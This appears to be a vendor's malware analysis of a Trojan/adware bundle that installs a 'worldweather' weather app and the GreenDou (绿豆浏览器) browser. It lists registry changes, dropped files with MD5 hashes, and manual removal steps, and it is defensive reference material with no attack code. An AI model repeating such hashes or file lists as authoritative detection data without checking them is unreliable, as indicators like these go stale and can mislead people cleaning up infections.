"DisplayName" = "绿豆浏览器 1.0.0.0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6E 45 6C 84 01 24 A1 EF 38 59 8B 06 81 67 27 90"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\绿豆浏览器]
"DisplayVersion" = "1.0.0.0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The process worldWeatherRealTime5002.exe:2408 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C7 E5 65 15 80 2A F8 F7 B1 7A 66 3F C5 CD 04 09"
[HKCR\AppID\worldWeatherRTP.EXE]
"AppID" = "{C75ABB58-E428-4F54-A75E-39E1905088A4}"
[HKCR\AppID\{C75ABB58-E428-4F54-A75E-39E1905088A4}]
"LocalService" = "worldWeatherRealTime5002"
"(Default)" = "worldWeatherRTP"
The Trojan deletes the following value(s) in system registry:
[HKCR\AppID\{C75ABB58-E428-4F54-A75E-39E1905088A4}]
"LocalService"
Dropped PE files
MD5 | File path |
---|---|
1eca983679d2f2760f15fc79a6a294ca | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\365weatherIns_61.exe |
99f345cf51b6c3c317d20a81acb11012 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsr5.tmp\KillProcDLL.dll |
e4ec95271ff1bcebab49bdfed6817a22 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsr5.tmp\SkinBtn.dll |
00a0194c20ee912257df53bfe258ee4a | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsr5.tmp\System.dll |
50fdadda3e993688401f6f1108fabdb4 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsr5.tmp\inetc.dll |
a7d710e78711d5ab90e4792763241754 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsr5.tmp\md5dll.dll |
ab73c0c2a23f913eabdc4cb24b75cbad | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsr5.tmp\nsDialogs.dll |
480f41c61ef59b1dbde50427b3d095b2 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsr5.tmp\nsWindows.dll |
50fdadda3e993688401f6f1108fabdb4 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsu2.tmp\Inetc.dll |
a7d710e78711d5ab90e4792763241754 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsu2.tmp\Md5dll.dll |
a5f8399a743ab7f9c88c645c35b1ebb5 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsu2.tmp\NSISdl.dll |
c17103ae9072a06da581dec998343fc1 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsu2.tmp\System.dll |
9b54944ce476591d65288b0701a52c46 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsu2.tmp\nsRandom.dll |
0a4fa7a9ba969a805eb0603c7cfe3378 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsu2.tmp\processwork.dll |
76d2faad042161f24b6c9c78de3bd265 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsu2.tmp\xID.dll |
0600be4459db030785c2d61ab8ea4de0 | c:\Program Files\greeou\GreenDou.exe |
1ec57595ea72f47d328acb5fa13aa6f9 | c:\Program Files\worldweather\5.0.0.5002\AQI.5002.exe |
af9dc00391e568586f6e045c0d80ec58 | c:\Program Files\worldweather\5.0.0.5002\PM10.5002.exe |
3ae2ae19da4de10a41f631e0cd59464d | c:\Program Files\worldweather\5.0.0.5002\PM25.5002.exe |
f41b53208000678976ec71d4574dcfa3 | c:\Program Files\worldweather\5.0.0.5002\mfc5002.dll |
f22066ce95253bc57a054623a65eda06 | c:\Program Files\worldweather\5.0.0.5002\sqlite3.dll |
b81124b08acb34b432fae845335bce99 | c:\Program Files\worldweather\5.0.0.5002\sqliteApi.dll |
2a4c40c30da6bbccf03928dcb998193c | c:\Program Files\worldweather\5.0.0.5002\uninst.exe |
f9e2d87db3700c704d8e7fffa0ab8985 | c:\Program Files\worldweather\5.0.0.5002\worldWeatherRealTime5002.exe |
f44c74c844114fa977315265813afb26 | c:\Program Files\worldweather\5.0.0.5002\worldWeatherUpdate.5002.exe |
7eab31806313acd8429450e72c294442 | c:\Program Files\worldweather\5.0.0.5002\worldweather.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
worldweather.exe:2452
worldWeatherUpdate.5002.exe:2896
365weatherIns_61.exe:408
greendou.exe:772
worldWeatherRealTime5002.exe:2408
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\All Users\Application Data\worldweather\Cfg5002.ini (288 bytes)
%Program Files%\worldweather\5.0.0.5002\Cfg5002.ini (216 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (964 bytes)
%Program Files%\worldweather\5.0.0.5002\weatherData.tmp (354 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@uujzy[1].txt (139 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6RMPQHIX\369[1].ico (16369 bytes)
%Documents and Settings%\All Users\Application Data\worldweather\PM10Context\PM10Context.db.!mv (835 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CZABEL6V\PM10Context[1].xml (835 bytes)
%Documents and Settings%\All Users\Application Data\worldweather\AQIContext\AQIContext.db.!mv (365 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6RMPQHIX\WeatherContext[1].xml (509 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3GJE5WP\PM25Context[1].xml (624 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sina.com[1].txt (196 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\common\366.ico.!mv (16369 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0PEXU1AN\AQIContext[1].xml (365 bytes)
%Documents and Settings%\All Users\Application Data\worldweather\PM25Context\PM25Context.db.!mv (624 bytes)
%Documents and Settings%\All Users\Application Data\worldweather\WeatherContext\WeatherContext.db.!mv (509 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\common\369.ico.!mv (16369 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0PEXU1AN\366[1].ico (16369 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp\System.dll (11 bytes)
%Program Files%\worldweather\5.0.0.5002\PM10.5002.exe (7192 bytes)
%Program Files%\worldweather\5.0.0.5002\weather.db (6584 bytes)
%Program Files%\worldweather\5.0.0.5002\uninst.exe (2251 bytes)
%Program Files%\worldweather\5.0.0.5002\updateContext\un_update.html (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp\ToggleImages.html (1 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\default\btn_move.jpg (1 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\default\bg_large.png (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp\btn_next.bmp (2392 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\default\btn_max.jpg (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb4.tmp (80589 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\common\future\n99.png (6 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\common\future\tips.ico (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp\loading1.bmp (696 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0PEXU1AN\tongji_61[1].htm (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp\KillProcDLL.dll (4 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\common\err.png (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp\checkbox1.bmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp\tongji.html (2 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\default\btn_min.jpg (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp\inetc.dll (784 bytes)
%Program Files%\worldweather\5.0.0.5002\areacode.db (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp\2.jpg (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp\btn_close.bmp (1 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\common\min.png (440 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp\bg.bmp (18424 bytes)
%Program Files%\worldweather\5.0.0.5002\updateContext\i.gif (170 bytes)
%Program Files%\worldweather\5.0.0.5002\updateContext\loading.gif (8 bytes)
%Program Files%\worldweather\5.0.0.5002\sqliteApi.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp\3.jpg (1552 bytes)
%Program Files%\worldweather\5.0.0.5002\worldWeatherRealTime5002.exe (4992 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\default\bg_small.png (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp\nsWindows.dll (10 bytes)
%Program Files%\worldweather\5.0.0.5002\updateContext\update.html (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp\nsDialogs.dll (9 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\worldweather\大众天气预报卸载.lnk (911 bytes)
%Program Files%\worldweather\5.0.0.5002\worldweather.exe (19096 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp\md5dll.dll (8 bytes)
%Program Files%\worldweather\5.0.0.5002\updateContext\updateRecord.db (1 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\common\loading.png (3 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\worldweather\大众天气预报.lnk (943 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp\checkbox2.bmp (2 bytes)
%Program Files%\worldweather\5.0.0.5002\AQI.5002.exe (7192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp\loading2.bmp (696 bytes)
%Program Files%\worldweather\5.0.0.5002\WeatherContext\WeatherContext.db (352 bytes)
%Program Files%\worldweather\5.0.0.5002\worldWeatherUpdate.5002.exe (11344 bytes)
%Program Files%\worldweather\5.0.0.5002\sqlite3.dll (20416 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp\1.jpg (1552 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\common\large\n99.png (784 bytes)
%Program Files%\worldweather\5.0.0.5002\PM25.5002.exe (11344 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\default\btn_setting.jpg (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp\SkinBtn.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp\btn_complete.bmp (2392 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\common\kz.png (3 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\common\close.png (873 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\default\skin.xml (6 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\default\btn_close.jpg (3 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\common\topbar.png (3 bytes)
%Program Files%\worldweather\5.0.0.5002\mfc5002.dll (5520 bytes)
%Documents and Settings%\All Users\Application Data\worldweather\updateContext\updateRecord.db (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6RMPQHIX\citydata[2].js (7666 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3GJE5WP\skin_[1].css (21 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6RMPQHIX\123.sogou[2] (10367 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0PEXU1AN\guide_tip[1].png (1459 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\VGX6.tmp (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3GJE5WP\lk_jumei[1].png (731 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6RMPQHIX\titlebg[1].png (50 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3GJE5WP\main[1].js (6192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6RMPQHIX\v33_sugg_ajaj_v40_3[2].js (1187 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6RMPQHIX\foot_slider[1].jpg (322 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6RMPQHIX\ufo2[1].js (17536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0PEXU1AN\20140512170407_319[1].jpg (232 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0PEXU1AN\DD_belatedPNG_0.0.8a-min[2].js (1208 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CZABEL6V\20130820165531_481[1].gif (50 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CZABEL6V\selogo_111207[1].png (1848 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3GJE5WP\main[2].js (2605 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CZABEL6V\skin2_0[1].gif (592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CZABEL6V\20140508103513_537[1].gif (6813 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CZABEL6V\20140512170546_833[1].jpg (232 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@123.sogou[2].txt (1879 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sogou[2].txt (640 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6RMPQHIX\skin3[1].gif (1314 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@123.sogou[1].txt (1398 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3GJE5WP\fine_cloudy[1].gif (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6RMPQHIX\citydata[1].js (7992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0PEXU1AN\_ads_2[2].js (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3GJE5WP\v53_2icos[1].gif (50 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6RMPQHIX\favicon[1].ico (1 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sogou[1].txt (774 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6RMPQHIX\123.sogou[1].htm (7472 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3GJE5WP\setskinbg[1].gif (397 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6RMPQHIX\fbg_about[1].png (805 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0PEXU1AN\cloudy[1].gif (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0PEXU1AN\v53_arrow_h[1].gif (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CZABEL6V\v53_123n[2].js (4349 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CZABEL6V\img-video-2[1].gif (225 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0PEXU1AN\DD_belatedPNG_0.0.8a-min[1].js (217 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CZABEL6V\get_tj[1].php (1199 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0PEXU1AN\20140513112717_7[1].jpg (3852 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CZABEL6V\guide_tip[1].png (2319 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0PEXU1AN\hotdata[1].js (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3GJE5WP\skin_tips_n1[1].gif (1 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@wan.sogou[1].txt (191 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3GJE5WP\setting_icon[1].gif (76 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3GJE5WP\rec[1].do (374 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0PEXU1AN\get_123_v53[1].php (16030 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3GJE5WP\subnav_v41[1].png (682 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0PEXU1AN\20140512112800_851[1].jpg (2380 bytes)
%Program Files%\greeou\profile\Defaults\last.ini (2306 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3GJE5WP\20130531144119_126[1].png (3810 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6RMPQHIX\v53_bicos[1].gif (826 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6RMPQHIX\v33_sugg_ajaj_v40_3[1].js (1352 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0PEXU1AN\hotdata[2].js (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3GJE5WP\logo_1112293[1].gif (866 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0PEXU1AN\search_arrow[1].gif (447 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3GJE5WP\i-ico-2b[1].png (173 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CZABEL6V\icon4[1].gif (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0PEXU1AN\_ads_2[1].js (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6RMPQHIX\ufo2[2].js (19464 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CZABEL6V\20140507144656_823[1].jpg (783 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6RMPQHIX\fIXLig2wT89333[1].jpg (2500 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CZABEL6V\selogo_111207[2].png (1606 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6RMPQHIX\selogo_111207[1].png (2008 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CZABEL6V\v53_123n[1].js (4851 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0PEXU1AN\img-news[1].gif (225 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0PEXU1AN\new-ico[1].png (211 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3GJE5WP\1oq9Gg9Y3L8813[1].jpg (1492 bytes)
%Program Files%\greeou\profile\Defaults\config.ini (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0PEXU1AN\20140507144124_693[1].jpg (232 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3GJE5WP\new-erweima2[1].png (2985 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu2.tmp\processwork.dll (6140 bytes)
%Program Files%\greeou\skin\Default\control\tab_hover.png (346 bytes)
%Program Files%\greeou\skin\Default\control\tab_bg.png (314 bytes)
%Program Files%\greeou\skin\Default\toolbar\24_new3.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu2.tmp\System.dll (11 bytes)
%Program Files%\greeou\skin\Default\misc\16_ad_hunter.png (716 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\365weatherIns_61.exe (119257 bytes)
%Program Files%\greeou\profile\Template\start\style.css (3 bytes)
%Program Files%\greeou\skin\Default\control\tab_sidebar.png (321 bytes)
%Program Files%\greeou\skin\Default\toolbar\16_favorites2.png (696 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu2.tmp\Md5dll.dll (8 bytes)
%Program Files%\greeou\skin\Default\control\MenuItem_Hover.png (2 bytes)
%Program Files%\greeou\skin\Default\misc\24_go.png (650 bytes)
%Program Files%\greeou\skin\Default\misc\16_open_in_bg.png (507 bytes)
%Program Files%\greeou\skin\Default\toolbar\16_favorites.png (700 bytes)
%Program Files%\greeou\profile\Defaults\CommandBars.ini (1 bytes)
%Program Files%\greeou\skin\Default\mskin.ini (10 bytes)
%Program Files%\greeou\GreenDou.exe (25123 bytes)
%Program Files%\greeou\skin\Default\control\status_bar_bg.png (445 bytes)
%Program Files%\greeou\skin\Default\control\combo_dropdown_hover.png (774 bytes)
%Program Files%\greeou\skin\Default\toolbar\24_forward.png (947 bytes)
%Program Files%\greeou\skin\Default\control\win_minimize.png (202 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu2.tmp\NSISdl.dll (14 bytes)
%Program Files%\greeou\skin\Default\toolbar\24_refresh.png (1 bytes)
%Program Files%\greeou\skin\Default\control\combo_dropdown.png (794 bytes)
%Program Files%\greeou\profile\Template\start\images\logo.gif (3 bytes)
%Program Files%\greeou\skin\Default\control\Button_Pressed.png (1 bytes)
%Program Files%\greeou\profile\Template\start\index.html (832 bytes)
%Program Files%\greeou\skin\Default\toolbar\24_home.png (1 bytes)
%Program Files%\greeou\skin\Default\misc\16_website_info.png (1 bytes)
%Program Files%\greeou\skin\Default\toolbar\24_new.png (879 bytes)
%Program Files%\greeou\skin\Default\control\title_bg.png (655 bytes)
%Program Files%\greeou\skin\Default\toolbar\24_home2.png (1 bytes)
%Program Files%\greeou\profile\Template\start\images\header_logo.gif (2 bytes)
%Program Files%\greeou\skin\Default\shared\16_edit.png (646 bytes)
%Program Files%\greeou\skin\Default\toolbar\24_back3.png (1 bytes)
%Program Files%\greeou\skin\Default\toolbar\24_stop2.png (1 bytes)
%Program Files%\greeou\profile\SearchEngine\config.ini (226 bytes)
%Program Files%\greeou\skin\Default\toolbar\16_new2.png (801 bytes)
%Program Files%\greeou\skin\Default\toolbar\16_page_zoom2.png (724 bytes)
%Program Files%\greeou\profile\Template\start\images\dian.gif (376 bytes)
%Program Files%\greeou\skin\Default\control\win_close.png (362 bytes)
%Program Files%\greeou\skin\Default\toolbar\24_refresh2.png (1 bytes)
%Program Files%\greeou\profile\Template\start\images\header_bg.gif (83 bytes)
%Program Files%\greeou\skin\Default\control\tab_active.png (1 bytes)
%Program Files%\greeou\skin\Default\control\mainframe.png (288 bytes)
%Program Files%\greeou\skin\Default\toolbar\24_back2.png (1 bytes)
%Program Files%\greeou\skin\Default\control\tab_inactive.png (281 bytes)
%Program Files%\greeou\skin\Default\control\sidebar_tab_inactive.png (259 bytes)
%Program Files%\greeou\skin\Default\misc\16_folder_open.png (614 bytes)
%Program Files%\greeou\skin\Default\toolbar\16_search.png (871 bytes)
%Program Files%\greeou\skin\Default\control\combosearch_dropdown.png (794 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu2.tmp\open.ini (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\setup_a7158.exe (354562 bytes)
%Program Files%\greeou\skin\Default\toolbar\16_search2.png (969 bytes)
%Program Files%\greeou\skin\Default\control\win_maximum.png (275 bytes)
%Program Files%\greeou\skin\Default\toolbar\16_new.png (637 bytes)
%Program Files%\greeou\skin\Default\toolbar\16_page_zoom.png (733 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu2.tmp\Inetc.dll (20 bytes)
%Program Files%\greeou\skin\Default\control\tab_sidebar_hover.png (322 bytes)
%Program Files%\greeou\skin\Default\control\sidebar_tab_active.png (957 bytes)
%Program Files%\greeou\skin\Default\control\progress.png (708 bytes)
%Program Files%\greeou\skin\Default\toolbar\24_back.png (953 bytes)
%Program Files%\greeou\skin\Default\control\combo.png (260 bytes)
%Program Files%\greeou\profile\SearchEngine\google.ico (1 bytes)
%Program Files%\greeou\skin\Default\control\tab_new.png (350 bytes)
%Program Files%\greeou\skin\Default\control\combosearch_dropdown_hover.png (774 bytes)
%Program Files%\greeou\profile\Template\start\left.html (1 bytes)
%Program Files%\greeou\skin\Default\toolbar\24_forward2.png (1 bytes)
%Program Files%\greeou\skin\Default\control\skin_selector.png (283 bytes)
%Program Files%\greeou\skin\Default\control\win_restore.png (302 bytes)
%Program Files%\greeou\skin\Default\control\Button_Checked.png (976 bytes)
%Program Files%\greeou\skin\Default\misc\16_page.png (519 bytes)
%Program Files%\greeou\skin\Default\control\tab_close.png (259 bytes)
%Program Files%\greeou\skin\Default\toolbar\16_history2.png (994 bytes)
%Program Files%\greeou\skin\Default\toolbar\16_undo2.png (840 bytes)
%Program Files%\greeou\skin\Default\control\tab_new_hover.png (346 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu2.tmp\xID.dll (3 bytes)
%Program Files%\greeou\profile\SearchEngine\taobao.ico (1 bytes)
%Program Files%\greeou\skin\Default\control\Button_Hover.png (1 bytes)
%Program Files%\greeou\skin\Default\toolbar\24_new2.png (1 bytes)
%Program Files%\greeou\skin\Default\misc\16_folder_closed.png (587 bytes)
%Program Files%\greeou\skin\Default\toolbar\24_stop.png (1 bytes)
%Program Files%\greeou\skin\Default\shared\16_new.png (650 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\绿豆浏览器\绿豆浏览器.lnk (678 bytes)
%Documents and Settings%\%current user%\Desktop\绿豆浏览器.lnk (666 bytes)
%Program Files%\greeou\skin\Default\toolbar\16_history.png (847 bytes)
%Program Files%\greeou\skin\Default\toolbar\16_undo.png (748 bytes)
%Program Files%\greeou\profile\SearchEngine\baidu.ico (2 bytes)
%Program Files%\greeou\skin\Default\misc\24_go2.png (648 bytes)
%Program Files%\greeou\skin\Default\control\combo_hover.png (261 bytes)
%Program Files%\greeou\skin\Default\control\tab_close_hover.png (2 bytes)
%Program Files%\greeou\profile\Defaults\searchkeys.ini (14 bytes)
%Program Files%\greeou\skin\Default\toolbar\24_forward3.png (1 bytes)
%Program Files%\greeou\ico\taobao.ico (2104 bytes)
%Program Files%\greeou\skin\Default\misc\16_open_in_new.png (548 bytes)
